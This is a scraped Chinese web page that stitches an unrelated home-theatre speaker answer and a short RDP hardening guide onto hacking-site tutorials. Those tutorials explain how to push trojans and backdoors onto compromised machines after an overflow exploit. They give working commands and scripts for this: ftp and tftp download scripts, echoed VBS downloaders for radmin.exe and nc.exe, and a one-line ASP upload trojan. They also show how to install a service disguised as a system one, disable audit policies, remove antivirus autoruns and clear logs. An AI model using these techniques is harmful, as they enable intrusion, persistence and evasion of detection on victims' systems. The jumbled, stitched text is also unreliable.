需要一份定向蓝牙音箱方案案,没有思路啊?求助网友了!

正在装修,关于全景声音箱的位置和选择求助
提问者:热心网友
您可能对以下关键字也有兴趣:
楼主您好1.中置不再是最重要的,所有都重要通过上面的例子大家应该明白全景声的魅力了,同时应该也会注意到在全景声家庭影院音箱的选用上也要做很大的改变。传统5.1声道家庭影院音箱系统中,各司其职分工明确:中置音箱主要负责人声对白,主音箱主要负责画面中的各种声音表现,环绕音箱负责画面以外的纵深声音,而低音炮则负责大动态低音效果以及整体的影院氛围感。我们一般认为中置音箱要使用性能最好的喇叭,因为电影中人声对白非常非常重要,除非你看的是卓别林。全景声系统里这些规则都被打破,因为声音是一个对象,它可以被灵活地分配到任意喇叭中去,比如在《忍者神龟》这部电影中,某些场景中乌龟在房顶说话,这时天空声道的喇叭就相当于传统影院中的中置音箱,或者说所有的音箱身份都是可以随时改变的,如果天空声道喇叭不能很好地表现人声频率,看这个片段时自然听起来效果就会很差。所以老蜗牛建议,最好各声道音箱都使用高素质的全频喇叭,以获得更完美的全景声体验。2.THX认证的偶极在家庭影院领域有一个关于声音的认证标准——THX认证,THX是对美国卢卡斯影业公司制定的电影院用音响系统专业标准的通称,THX并不是一种独立的放声系统,它对杜比定向逻辑环绕系统进行了改进,使环绕声效果得到进一步的增强。该认证标准建议家庭影院环绕音箱使用偶极式环绕,这样可以获得更好的包围感。不过在组建全景声家庭影院时这个就不适用了,全景声家庭影院音箱就像足球队成员的身份可以随时互换,后卫可以突然变成前锋,在这种情况下使用偶极环绕就会导致声像定位不准,当然如果是三向发声的环绕音箱就可以既保证包围感,又解决这个问题了,当然价格会高出很多。3.音箱安装位置变化家用杜比全景声最高支持64个声道(当然目前还没有那么强大的功放),在音箱的安装方面相较传统5.1、7.1系统可以更灵活,当然为了兼容传统的家庭影院,基础声道依然按照5.1、7.1方式布局,最大的区别是增加的天空声道。可以使用嵌入式或者吸顶式全频喇叭,当然如果条件不允许或者怕麻烦,也可以用反射式音箱,反射式音箱优点就是安装简便,直接放在主音箱或者环绕音箱上面就可以了,当然缺点也很明显,对天花板有一定的要求,最好是光滑的表面,可以形成镜面反射,而传统的家庭影院可能会在吊顶时使用大量扩散体或者吸音板,这样会严重影响反射式音箱的使用。而且房间高度最好介于2.4 米到2.7 米之间,过高的房间会导致反射出来的声音发散,声像定位变得模糊。
相关问题:>>
交房过户中
购房完成后
账号不能为空
密码不能为空
验证码必须4位
用户名4-20位数字字母中文下划线
密码不正确且不能为空
*确认密码:
确认密码和密码不一致
验证码必须4位
我已阅读并同意
热门城市:
周边二手房:
热门城市房价:
周边租房:Windows&2000&的终端由于使用简单、方便等特点,备受众多管理员喜爱,是很多管理员都利用它进行远程管理器的一个重要。然后就是因为它的简单、方便,不与当前用户产生一个交互式登陆,可以在后台登陆操作,它也受到了黑客关注。现在我们来通过认真的配置来加强它的安全性。1。修改终端的端口修改:HKEYLOCALMACHINE\SYSTEM\CurrentControlSet\Control\Terminal&Server\WinStations\RDP-Tcp&和HKEYLOCALMACHINE\SYSTEM\CurrentControlSet\Control\Terminal&Server\Wds\rdpwd\Tds\tcp将这两个分支下的portnumber键值改为你想要的端口。&&在客户端这样连接就可以了.2。隐藏登陆的用户名&&&隐藏上次登陆的用户名,这样可防止恶意者获得系统的管理用户名后进行穷举破解。HKEYLOCALMACHINE\SOFTWARE\Microsoft\Windows&NT\CurrentVersion\WinlogonDontDisplayLastUserName&的值改为1就可以了。3。指定用户登陆。为了安全,我们没必要让器上所有用户都登陆,譬如以下,我们只允许315safe这个用户登陆到终端器,按照如下方法做限制:在&管理&—&终端配置&—&连接&,再选择右边的&RDP-TCP&的属性,找到&权限&选项,删除administrators组,然后再添加我们允许的315safe这个用户,其他一律不允许登陆。4、启动审核&&&&&&终端&默认没有日志记录,需要手动开启,在RDP-TCP&的属性,找到&权限&选项下&高级&里有个&审核&添加everyone,然后选择需要记录的的事件。&事件查看器&里终端日志很不完善。下面我们就来完善一下终端器日志。在D盘目录下,创建2个文件&ts2000.BAT&(用户登录时运行的脚本文件)和&ts2000.LOG&(日志文件)。  编写&ts2000.BAT&脚本文件:  time&/t&&&ts2000.log  netstat&-n&-p&tcp&|&find&&P:3389&P&&ts2000.log  start&Explorer  第一行用于记录用户登录的时间,&time&/t&的意思是返回系统时间,使用追加符号&&&&把这个时间记入&ts2000.LOG&作为日志的时间字段;第二行记录终端用户的IP地址,&netstat&是用来显示当前网络连接状况的命令,&-n&用于显示IP和端口,&-p&tcp&显示TCP,管道符号&|&会将&netstat&命令的结果输出给&find&命令,再从输出结果中查找包含&?3389&的行,最后把这个结果重定向到日志文件&ts2000.LOG&;最后一行为启动Explorer的命令。  把&ts2000.BAT&设置成用户的登录脚本。在终端器上,进入&RDP-Tcp属性&窗口,并切换到&环境&框,勾选&替代用户配置文件和远程桌面连接或终端客户端的设置&,在&程序路径和文件名&栏中输入&D:\ts2000.bat&,在&开始位置&栏中输入&D:\&,点击&确定&即可完成设置。此时,我们就可通过终端日志了解到每个用户的行踪了。5。限制、指定连接终端的地址&&启用器自带的IPSEC来指定特定的IP地址连接器。首先禁止所有3389的连接。&1。在&本地安全策略&选择&IP安全策略,在本地机器&,在右边的空白处按右键,&创建IP安全策略&,下一步,给策略取名(如3389),不选&激活默认响应规则&,完成,这是会打开一个对话框,是新建立策略(3389)的属性。2。添加新建规则,出现&IP筛选器列表&,起名叫all3389,不选&使用添加向导&再按&添加&。按&确定&、&关闭&回到&新规则&属性窗口,选中刚设置的规则&all3389&,再按&筛选器操作&选项,&筛选器操作&里没有我们的&阻止&我们新建立一项阻止。还是不选&使用添加向导&,按&添加&,在弹出的对话框中,在&安全措施&处选&阻止&项。再按&常规&,在&名称&处给他起个名字,如&阻止3389&,然后确定回到&新规则&属性的&筛选器操作&处,选中刚才建立的&阻止3389&,再按&关闭&,回到开始时的&本地安全设置&对话框,选中&3389&后指派。这样所有的机器都无法连接到我们终端器了。3。同样器也被栏在外面了,下面我们建立一条规则,只允许器信任的机器进行连接,譬如219.139.240.90&.我们打开&3389&的属性,不选&使用添加向导&,按&添加&,打开&新规则&属性,再按&添加&,出现&IP筛选器列表&,给它起个名字&OK3389&,不选使用添加向导,再按&添加&,出现&筛选器&属性,&寻址&选项设置成如图。处设置TCP,3389,在&筛选器操作&里选择&允许&。这样就OK了,这样除了我们自己信任的机器,其他任何机器都无法登陆到终端器了。也可以设置为一个网关的信任机器。这样终端器就安全多了。
【】【】【】
参与评论( 0条)
评论内容只代表网友观点,与立场无关。
&&& 凡本站发布的所有文字、图片和音视频等信息版权均归本站所有,任何媒体、网站或个人未经本 站授权不得转载、链接、转贴或以其他方式复制编辑发表。经本站授权的使用时必须注明&稿件来源: 黑客基地&,违者本站将依法追究 其责任。凡本站未声明的文/图等稿件均为转载稿,转载仅出于传递更多信息之目的,并不意味着赞同其观点或证实其内容的真实性。本 站转载文字、图片和音视频稿件等信息仅代表作者之观点,对其他个人或团体造成任何影响本站不负任何责任。如本 站转载稿件涉及版权等问题,请速来电或来函与本站联系 。联系电话:(010)
&&& 凡本站发布的所有文字、图片和音视频等信息版权均归本站所有,任何媒体、网站或个人未经本 站授权不得转载、链接、转贴或以其他方式复制编辑发表。经本站授权的使用时必须注明&稿件来源: 黑客基地&,违者本站将依法追究 其责任。凡本站未声明的文/图等稿件均为转载稿,转载仅出于传递更多信息之目的,并不意味着赞同其观点或证实其内容的真实性。本 站转载文字、图片和音视频稿件等信息仅代表作者之观点,对其他个人或团体造成任何影响本站不负任何责任。如本 站转载稿件涉及版权等问题,请速来电或来函与本站联系 。联系电话:(010)
— 黑眼睛 @ 10:07 pm
溢出下shell下的文件上传 随着网上溢出程序的流行经常能在BBS和群里看到象我等&快餐黑客&抱怨说溢出之后不知道怎样传送自己的木马,后门到肉鸡上。而没有在肉鸡上留下木马或后门进一步控制不能算是完成一次成功的入侵,所以我在此归纳了一下网上流行的溢出shell下传送文件的方法,希望能够对刚入门的新手朋友带来帮助。 1.首先要说的是初学者最爱的IPC$共享传送方式了,用法很简单。先在溢出shell下建立一个管理员权限的帐号,然后在本地的CMD下与肉鸡进行连接,命令如下: net use \IP\共享目录(后面要大$) &密码& /user:&用户名& copy c:\file \IP\共享目录 这里再提供一个思路,大家有没有想过其实我们也可以通过肉鸡来入侵我们自己的机器同样达到传送文件的目的,只是将上传改为下载。后面的命令改为 copy \你的IP\共享目录\文件 c:\file 大家可以根据这个思路活学活用。玩过MS03-049的朋友都知道这个溢出需要139,445端口,所以只要溢出成功就直接将对方的共享目录映射到本地,这样就剩得一条条打命令了,命令如下: net use z: \IP\共享目录 如果对方把默认共享关闭了你可以在溢出shell下用net share命令开启,另外传完文件后记得得断开连接,命令:ne use z:\IP\共享目录 /del 2.接着我们说一下很多朋友都用的tftp方式。首先你得拥有一个公网IP,然后去网上down一个tftpd32.exe,把它放到你要传送的文件的目录里运行一下就OK了。在溢出shell下执行命令: tftp -i 你的IP get xx.exe 这样就完成了文件的传输,当管理员限制用TFTP传送文件,一般就是直接封69端口,修改默认69端口,TFTPD32.exe等TFTP服务端 是可以自己设置端口的,这里就不多讲,只不过在设置后要重新启动一次 TFTP服务端。至于客户端 在system32\drivers\etc\文件夹下有一个services文件。打开如下: # Copyright ?
Microsoft Corp. # # This file contains port numbers for well-known services defined by IANA # # Format: # # &service name& &port number&/&protocol& [aliases...] [#&comment&] # echo 7/tcp echo 7/udp discard 9/tcp sink null discard 9/udp sink null systat 11/tcp users #Active users systat 11/tcp users #Active users … tftp 69/udp #Trivial File Transfer … 不难看出,69/udp就是定义tftp默认端口的,_blank&协议为udp。具体怎么用只要这两句,其实就是比原来多加了一句改端口的: echo tftp 8300/udp & %systemroot%\system32\drivers\etc\services tftp -i xxx.xxx.xxx.xxx get srv.exe 注意:请先把tftp服务端端口设定为与自定义端口一样的,这里是8300。 _blank&安全点的做法: ren %systemroot%\system32\drivers\etc\services 1 echo tftp 8300/udp &2 copy 2+%systemroot%\system32\drivers\etc %systemroot%\system32\drivers\etc\services 当然这个方法也不是每次都成功的,放火墙和管理员的防黑设置都能让你的文件传输失败。所以大家千万别老往一个死胡同走,有句话说得好,条条道路通罗马。 3.下面我们继续说FTP方式,玩过溢出的都知道,在溢出shell下用FTP命令登陆_blank&服务器输入用户名后没等输入密码CMD窗口就停顿在那里处于假死状态了。。所以大家通常是开启肉鸡的telnet服务,连接上去后Z再登陆FTP_blank&服务器传输文件。或者是在肉鸡上写脚本,命令如下: echo ftp&1.txt echo open xxx.xxx.xxx.xxx&1.txt echo user&&1.txt echo pass&&1.txt echo bin&&1.txt echo get aoqi.rar&&1.txt echo bye&&1.txt ftp -s:1.txt & 完后用ftp -s:1.txt就可以自动下载了。 ftp+自定义端口 其实ftp自定义端口非常简单,只要在ip地址后面空格,紧跟自定义的端口就可以了,如下: echo open xxx.xxx.xxx.xxx 2121 &ftp.txt echo user &&ftp.txt echo password &&ftp.txt echo bin &&ftp.txt [可选] echo get aoqi.rar&&ftp.txt echo bye &&ftp.txt ftp -s:ftp.txt 这里自定义端口为2121,只要和ftp服务端的端口一致就行拉 现在再说以下怎样直接在溢出shell下使用FTP传输文件而不用脚本完成。居我所知有2种方法:其一是将你的FTP_blank&服务器设为匿名访问,这样直接用FTP命令登陆到_blank&服务器就可以下载了。其二是将你的FTP的帐号密码设为空,但这样设置的FTP_blank&服务器有一定危险性,大家记得把权限设为只能下载或者改一下FTP的端口.通过以下命令就可以下载了: C:\WINNT\system32&ftp ftp open xxx.kmip.net User (danne.kmip.net:(none)): 1 bin get 2.exe bye & C:\WINNT\system32&aoqi.exe //aoqi.exe是自解压缩包 2.exe & C:\WINNT\system32&dir 1.bat //1.bat是后门自动安装批处理 dir 1.bat 驱动器 C 中的卷没有标签。 卷的序列号是
& C:\WINNT\system32 的目录 & 找不到文件 //这里我不知道为什么解压出来后第一次找文件总是找不到 & C:\WINNT\system32&dir 2.bat //2.bat是radmin自动安装批处理 dir 2.bat 驱动器 C 中的卷没有标签。 卷的序列号是
& C:\WINNT\system32 的目录 &
13:04 85 2.bat 1 个文件 85 字节 0 个目录 4,735,807,488 可用字节 & & 成功率有99%吧,也是本人我一直用的哦~推荐,只是需要自己架设一台FTP_blank&服务器出来,可以在你机器上架,或者肉鸡上,我们要充分利用肉鸡嘛(另外多说两句,肉鸡要定期维护,勤打补丁,不要被同行搞去了或被管理员发现)~如果你没有FTP的话我可以提供. 4.写程序下载 脚本是非常好的东西,只要把源码保存到一个文件中就能运行。所以在shell下,用 echo语句直接写到一个文件中,在用相应的解释程序执行就可以啦。这里是一个程序 实例的简化: echo Set xPost = CreateObject(&Microsoft.XMLHTTP&) &iget.vbe echo xPost.Open &GET&,&/radmin.exe&,0 &&iget.vbe echo xPost.Send() &&iget.vbe echo Set sGet = CreateObject(&ADODB.Stream&) &&iget.vbe echo sGet.Mode = 3 &&iget.vbe echo sGet.Type = 1 &&iget.vbe echo sGet.Open() &&iget.vbe echo sGet.Write(xPost.responseBody) &&iget.vbe echo sGet.SaveToFile &radmin.exe&,2 &&iget.vbe 然后执行cscript 167168.vbs就可以啦.其中,/srv.exe改成你放 文件的网站路径,srv.exe可以改成保存文件的路径。 5.start its:/ca.rar (看清楚,小心论坛自动加的标签) cd &C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\& (假设系统装在c盘,且当前环境是SYSTEM。如果是用户环境,修改Default User为该用户名) dir /s ca[1].rar 然后会显示ca[1].rar的具体位置,比如C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5QMVC11H\ca[1].rar 最后: copy 0QMVC11H\ca[1].rar c:\winnt\system32\ca.rar del 0QMVC11H\ca[1].rar & 总结了这5种常规方法,其实还有一些非常规的方法也可以,比如建立好管理员帐号后用Dame Ware远程控制工具远程安装后用它的文件传送功能等等.这里我就不说了~一般掌握上面5种方法后相信传送文件不是难题了~另外如果大家还有其他方法也希望告诉小弟,可以到http://167168.kmip.net来找我。 & ############################################################################################iget.vbe 脚本代码。 Set xPost = CreateObject(&Microsoft.XMLHTTP&)? xPost.Open &GET&,&/radmin.exe&,0? xPost.Send()? Set sGet = CreateObject(&ADODB.Stream&)? sGet.Mode = 3? sGet.Type = 1 sGet.Open() sGet.Write(xPost.responseBody) sGet.SaveToFile &radmin.exe&,2? & iLocal?= LCase(WScript.Arguments(1))? iRemote = LCase(WScript.Arguments(0))? Set xPost = CreateObject(&Microsoft.XMLHTTP&)? xPost.Open &GET&,iRemote,0? xPost.Send()? Set sGet = CreateObject(&ADODB.Stream&)? sGet.Mode = 3? sGet.Type = 1? sGet.Open()? sGet.Write(xPost.responseBody)? sGet.SaveToFile iLocal,2?
— 黑眼睛 @ 7:13 am
前言Cmd Shell(命令行交互)是黑客永恒的话题,它历史悠久并且长盛不衰。本文旨在介绍和总结一些在命令行下控制Windows系统的方法。这些方法都是尽可能地利用系统自带的工具实现的。文件传输对于溢出漏洞获得的cmd shell,最大的问题就是如何上传文件。由于蠕虫病毒流行,连接ipc$所需要的139或445端口被路由封锁。再加上WinXP系统加强了对ipc$的保护,通过ipc$及默认共享上传文件的手段基本无效了。ftp和tftp是两种可行的方法,介于其已被大家熟知,本文就不介绍了。还有三种大家熟悉的办法,作为总结我再提一下:1,用Echo命令写ASP木马。前提当然是目标主机上已经安装了IIS。一般的ASP木马&体积&较大,不适合直接用echo命令写入文件,这里我提供一个小巧的。直接给出echo版:@echo ^&%with server.createobject(&adodb.stream&):.type=1:.open:.write request.binaryread(request.totalbytes):.savetofile server.mappath(request.querystring(&s&)),2:end with%^& &up.asp注意,只有一行,中间没有回车符。生成的up.asp不能用浏览器访问,只能用下面这个脚本:with wscriptif .arguments.count&3 then .quiturl=.arguments(0)&&?s=&&.arguments(2)fn=.arguments(1)end withwith createobject(&adodb.stream&).type=1:.open:.loadfromfile fn:s=.read:.closeend withwith createobject(&microsoft.xmlhttp&).open &post&,url,false:.send swscript.echo .statustextend with将其保存为up.vbs。假设目标IP为123.45.67.89,up.asp在IIS虚拟根目录下,需要上传的文件为nc.exe,上传后保存为mm.exe,相应的命令是:cscript up.vbs http://123.45.67.89/up.asp nc.exe mm.exe注意,这个命令是在本地命令行中执行的,不要弄错了。另外,通过IIS上传会留日志,要记得清除哦。2,自动下载到网页缓存中。例如:start its:/soft/ps.exe在远程shell中执行上面这个命令后,ps.exe已经下载到目标主机的网页缓存目录中了。然后:cd &C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5&dir /s ps[1].exe于是获得ps.exe的具体位置(每台主机都不一样),如:C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\AB094JIT 的目录 14:24 49,152 ps[1].exe1 个文件 49,152 字节最后:copy AB094JIT\ps[1].exe c:\path\ps.exedel AB094JIT\ps[1].exe补充说明:对于以服务为启动方式的后门所提供的shell,其用户身份一般是System。此时网页缓存目录的位置就如例子中所示。如果shell的身份不是System,需要修改Default User为相应的用户名。本方法会启动一个IE进程,记得要将它杀掉。如果是System身份的shell,不会在本地出现窗口而暴露。另外,用ms-its代替its效果完全一样。3,Echo一个脚本下载web资源。现成的工具是iGet.vbs。我再给出一个含必要容错功能的版本。仍然是echo版:@echo with wscript:if .arguments.count^&2 then .quit:end if & dl.vbs@echo set aso=.createobject(&adodb.stream&):set web=createobject(&microsoft.xmlhttp&) && dl.vbs@echo web.open &get&,.arguments(0),0:web.send:if web.status^&200 then .echo &Error:&+web.status:.quit && dl.vbs@echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with && dl.vbs举例&&下载ps.exe并保存到c:\path下:cscript dl.vbs /soft/ps.exe c:\path\ps.exe注意,这是在远程shell中执行的。4,Echo经过编码的任何文件,再用脚本+debug还原。前面两个办法都不能保证穿过防火墙。而且,除非自己架Web服务器,一般的Web资源都是以压缩文件的形式提供。如果目标主机没有解压工具,还是没辙。那么只有出&杀手锏&了!echo命令加重定向操作符可以写入ASCII码小于128的字符,但大于等于128的不行。只有将本地文件重新&编码&为可显示的字符,才能方便地写入远程主机。首先能想到的就是base64编码,即email附件的编码方式。但vbs不支持位操作,因此编码和解码较复杂。更麻烦的是,脚本以二进制流方式处理文件的能力很差。(ADODB.Stream可以以流方式写文件,但我无法构造出相应的数据类型。二进制数据流可以用midb函数转成字符串,但反过来不行。我花了两天时间,还是没能解决这个问题。如果有谁能用vbs或js写任意的字节数据到文件中,恳请赐教。)无奈只有请debug.exe出马了。原理很多人都知道,我不介绍了,直接给出成果&&编码脚本:fp=wscript.arguments(0)fn=right(fp,len(fp)-instrrev(fp,&\&))with createobject(&adodb.stream&).type=1:.open:.loadfromfile fp:str=.read:sl=lenb(str)end withsll=sl mod 65536:slh=sl\65536with createobject(&scripting.filesystemobject&).opentextfile(fp&&.bat&,2,true).write &@echo str=&&&for i=1 to slbt=ascb(midb(str,i,1))if bt&16 then .write &0&.write hex(bt)if i mod 128=0 then .write &&&_&&debug.vbs&+vbcrlf+&@echo +&&&next.writeline &&&&&debug.vbs&+vbcrlf+&@echo with wscript.stdout:r=vbcrlf&_+&:for i=1 to len(str) step 48:.write &&e&&+hex(256+(i-1)/2)&_+&:for j=i to i+46 step 2:.write && &&+mid(str,j,2):next:.write r:next&&debug.vbs&.writeline &@echo .write &&rbx&&+r+&&&+hex(slh)+&&&+r+&&rcx&&+r+&&&+hex(sll)_+&&&+r+&&n debug.tmp&&+r+&&w&&+r+&&q&&+r:end with&_+&&&debug.vbs&&cscript //nologo debug.vbs|debug.exe&nul&&ren debug.tmp &&&&fn&&&&&del debug.vbs&end with将其保存为echo.vbs。假设要上传nc.exe,那么在本地命令行输入命令:cscript echo.vbs nc.exe也可以直接把要传输的文件的图标拖放到脚本文件的图标上。稍等一会儿,在当前目录下将生成一个nc.exe.bat。用记事本等编辑工具打开它,可以看到如下内容:@echo str=&4D5AFFFF00000E1FBA0E00B409CD21B8014CCD6DE6F756EF52E0D0D0A0000&_&&debug.vbs@echo +&0400B98EAE0F010BB0&_&&debug.vbs@echo +&2E00&_&&debug.vbs@echo +&9C2EC000AC02E005C00&_&&debug.vbs&&&&&&&&(省略若干行)&&&&@echo +&&&&debug.vbs@echo with wscript.stdout:r=vbcrlf:for i=1 to len(str) step 48:.write &e&+hex(256+(i-1)/2):for j=i to i+46 step 2:.write & &+mid(str,j,2):next:.write r:next&&debug.vbs@echo .write &rbx&+r+&0&+r+&rcx&+r+&E800&+r+&n debug.tmp&+r+&w&+r+&q&+r:end with&&debug.vbs&&cscript //nologo debug.vbs|debug.exe&nul&&ren debug.tmp &NC.EXE&&del debug.vbs全选 -》 复制 -》 切换到远程命令行窗口 -》 粘贴。如果网速不是很慢的话,整个上传过程大约需要20秒。几点说明:1,大的文件传输不稳定,可能会使shell死掉。所以文件越小效果越好。建议原文件不要超过100KB。2,在传输大文件前,可以先传个小的文件作为&热身&,让16位虚拟机ntvdm.exe驻留后台。所有文件传完后,为隐蔽起见,应该把ntvdm进程杀掉。3,某些cmd shell每个命令都需要附加两个回车,那nc.exe.bat就不能直接用了。4,单个命令的长度是有限的,所以不能只用一个echo完成全部任务。而且,对于nc提供的cmd shell,稍长一些的命令竟然会使shell自动退出(溢出了?)。你可以修改&i mod 128=0&语句中的128以调整每个echo命令的长度。每次echo的字符为这个数乘以2。5,解码过程没有脚本参与也是可以的。使用脚本的目的是减少传输的数据量(因为压缩了数据)。如果有时间,我会写一个更完善的脚本,加强数据压缩能力,增加数据校验功能。能上传文件当然一切都好办了,但很多操作用Windows自带的工具更方便。在你到处寻找需要的工具时,不要忘了Windows本身。系统配置这节包括三方面内容:注册表、服务和组策略。先说注册表。很多命令行下访问注册表的工具都是交互式的,溢出产生的shell一般不能再次重定向输入/输出流,所以无法使用。好在系统自带的regedit.exe足够用了。1,读取注册表先将想查询的注册表项导出,再用type查看,比如:C:\&regedit /e 1.reg &HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp&C:\&type 1.reg | find &PortNumber&&PortNumber&=dword:00000d3dC:\&del 1.reg所以终端服务的端口是3389(十六进制d3d)2,修改/删除注册表项先echo一个reg文件,然后导入,比如:echo Windows Registry Editor Version 5.00 &1.regecho. &&1.regecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0] &&1.regecho &TelnetPort&=dword: &&1.regecho &NTLM&=dword: &&1.regecho. &&1.regregedit /s 1.reg将telnet服务端口改为2323(十六进制913),NTLM认证方式为1。要删除一个项,在名字前面加减号,比如:[-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Serv-U]要删除一个值,在等号后面用减号,比如:[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]&KAVRun&=-3,用inf文件访问注册表上面对注册表的三个操作,也可以用下面这个inf文件来实现:[Version]Signature=&$WINDOWS NT$&[DefaultInstall]AddReg=My_AddReg_NameDelReg=My_DelReg_Name[My_AddReg_Name]HKLM,SOFTWARE\Microsoft\TelnetServer\1.0,TelnetPort,0×3HKLM,SOFTWARE\Microsoft\TelnetServer\1.0,NTLM,0×[My_DelReg_Name]HKLM,SYSTEM\CurrentControlSet\Services\Serv-UHKLM,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,KAVRun将它写入c:\path\reg.inf然后用下面这个命令&安装&:rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\path\reg.inf几点说明:1,[Version]和[DefaultInstall]是必须的,AddReg和DelReg至少要有一个。My_AddReg_Name和My_DelReg_Name可以自定义。0×表示REG_DWORD数据类型,0×或省略该项(保留逗号)表示REG_SZ(字符串)。0×表示REG_EXPAND_SZ。2323也可以用0×913代替。关于inf文件的详细信息,可以参考DDK帮助文档。2,InstallHinfSection是大小写敏感的。它和setupapi之间只有一个逗号,没有空格。128表示给定路径,该参数其他取值及含义参见MSDN。特别注意,最后一个参数,必须是inf文件的全路径,不要用相对路径。3,inf文件中的项目都是大小写不敏感的。接下来说服务。如果想启动或停止服务,用net命令就可以。但想增加或删除服务,需要用SC,instsrv.exe,xnet.exe等工具。而这些工具系统没有自带(XP和2003自带SC)。导入注册表虽然可以,但效果不好,原因后面会提到。还是得靠inf文件出马。增加一个服务:[Version]Signature=&$WINDOWS NT$&[DefaultInstall.Services]AddService=inetsvr,,My_AddService_Name[My_AddService_Name]DisplayName=Windows Internet ServiceDescription=提供对 Internet 信息服务管理的支持。ServiceType=0×10StartType=2ErrorControl=0ServiceBinary=%11%\inetsvr.exe保存为inetsvr.inf,然后:rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\path\inetsvr.inf这个例子增加一个名为inetsvr的服务(是不是很像系统自带的服务,呵呵)。几点说明:1,最后四项分别是服务类型:0×10为独立进程服务,0×20为共享进程服务(比如svchost);启动类型:0 系统引导时加载,1 OS初始化时加载,2 由SCM(服务控制管理器)自动启动,3 手动启动,4 禁用。(注意,0和1只能用于驱动程序)错误控制:0 忽略,1 继续并警告,2 切换到LastKnownGood的设置,3 蓝屏。服务程序位置:%11%表示system32目录,%10%表示系统目录(WINNT或Windows),%12%为驱动目录system32\drivers。其他取值参见DDK。你也可以不用变量,直接使用全路径。这四项是必须要有的。2,除例子中的六个项目,还有LoadOrderGroup、Dependencies等。不常用所以不介绍了。3,inetsvr后面有两个逗号,因为中间省略了一个不常用的参数flags。删除一个服务:[Version]Signature=&$WINDOWS NT$&[DefaultInstall.Services]DelService=inetsvr很简单,不是吗?当然,你也可以通过导入注册表达到目的。但inf自有其优势。1,导出一个系统自带服务的注册表项,你会发现其执行路径是这样的:&ImagePath&=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,74,\00,6c,00,6e,00,74,00,73,00,76,00,72,00,2e,00,65,00,78,00,65,00,00,00可读性太差。其实它就是%SystemRoot%\system32\tlntsvr.exe,但数据类型是REG_EXPAND_SZ。当手动导入注册表以增加服务时,这样定义ImagePath显然很不方便。如果用REG_SZ代替会有些问题&&不能用环境变量了。即只能使用完整路径。用inf文件完全没有这个问题,ServiceBinary(即ImagePath)自动成为REG_EXPAND_SZ。2,最关键的是,和用SC等工具一样,inf文件的效果是即时起效的,而导入reg后必须重启才有效。3,inf文件会自动为服务的注册表项添加一个Security子键,使它看起来更像系统自带的服务。另外,AddService和DelService以及AddReg、DelReg可以同时且重复使用。即可以同时增加和删除多个服务和注册表项。详细的内容还是请查看DDK。最后说说组策略。组策略是建立Windows安全环境的重要手段,尤其是在Windows域环境下。一个出色的系统管理员,应该能熟练地掌握并应用组策略。在窗口界面下访问组策略用gpedit.msc,命令行下用secedit.exe。先看secedit命令语法:secedit /analyzesecedit /configuresecedit /export secedit /validatesecedit /refreshpolicy 5个命令的功能分别是分析组策略、配置组策略、导出组策略、验证模板语法和更新组策略。其中secedit /refreshpolicy 在XP/2003下被gpupdate代替。这些命令具体的语法自己在命令行下查看就知道了。与访问注册表只需reg文件不同的是,访问组策略除了要有个模板文件(还是inf),还需要一个安全数据库文件(sdb)。要修改组策略,必须先将模板导入安全数据库,再通过应用安全数据库来刷新组策略。来看个例子:假设我要将密码长度最小值设置为6,并启用&密码必须符合复杂性要求&,那么先写这么一个模板:[version]signature=&$CHICAGO$&[System Access]MinimumPasswordLength = 6PasswordComplexity = 1保存为gp.inf,然后导入:secedit /configure /db gp.sdb /cfg gp.inf /quiet这个命令执行完成后,将在当前目录产生一个gp.sdb,它是&中间产品&,你可以删除它。/quiet参数表示&安静模式&,不产生日志。但根据我的试验,在2000sp4下该参数似乎不起作用,XP下正常。日志总是保存在%windir%\security\logs\scesrv.log。你也可以自己指定日志以便随后删除它。比如:secedit /configure /db gp.sdb /cfg gp.inf /log gp.logdel gp.*另外,在导入模板前,还可以先分析语法是否正确:secedit /validate gp.inf那么,如何知道具体的语法呢?当然到MSDN里找啦。也有偷懒的办法,因为系统自带了一些安全模板,在%windir%\security\templates目录下。打开这些模板,基本上包含了常用的安全设置语法,一看就懂。再举个例子&&关闭所有的&审核策略&。(它所审核的事件将记录在事件查看器的&安全性&里)。echo版:echo [version] &1.infecho signature=&$CHICAGO$& &&1.infecho [Event Audit] &&1.infecho AuditSystemEvents=0 &&1.infecho AuditObjectAccess=0 &&1.infecho AuditPrivilegeUse=0 &&1.infecho AuditPolicyChange=0 &&1.infecho AuditAccountManage=0 &&1.infecho AuditProcessTracking=0 &&1.infecho AuditDSAccess=0 &&1.infecho AuditAccountLogon=0 &&1.infecho AuditLogonEvents=0 &&1.infsecedit /configure /db 1.sdb /cfg 1.inf /log 1.log /quietdel 1.*也许有人会说:组策略不是保存在注册表中吗,为什么不直接修改注册表?因为不是所有的组策略都保存在注册表中。比如&审核策略&就不是。你可以用regsnap比较修改该策略前后注册表的变化。我测试的结果是什么都没有改变。只有&管理模板&这一部分是完全基于注册表的。而且,知道了具体位置,用哪个方法都不复杂。比如,XP和2003的&本地策略&-》&安全选项&增加了一个&本地帐户的共享和安全模式&策略。XP下默认的设置是&仅来宾&。这就是为什么用管理员帐号连接XP的ipc$仍然只有Guest权限的原因。可以通过导入reg文件修改它为&经典&:echo Windows Registry Editor Version 5.00 &1.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] &&1.regecho &forceguest&=dword: &&1.regregedit /s 1.regdel 1.reg而相应的用inf,应该是:echo [version] &1.infecho signature=&$CHICAGO$& &&1.infecho [Registry Values] &&1.infecho MACHINE\System\CurrentControlSet\Control\Lsa\ForceGuest=4,0 &&1.infsecedit /configure /db 1.sdb /cfg 1.inf /log 1.logdel 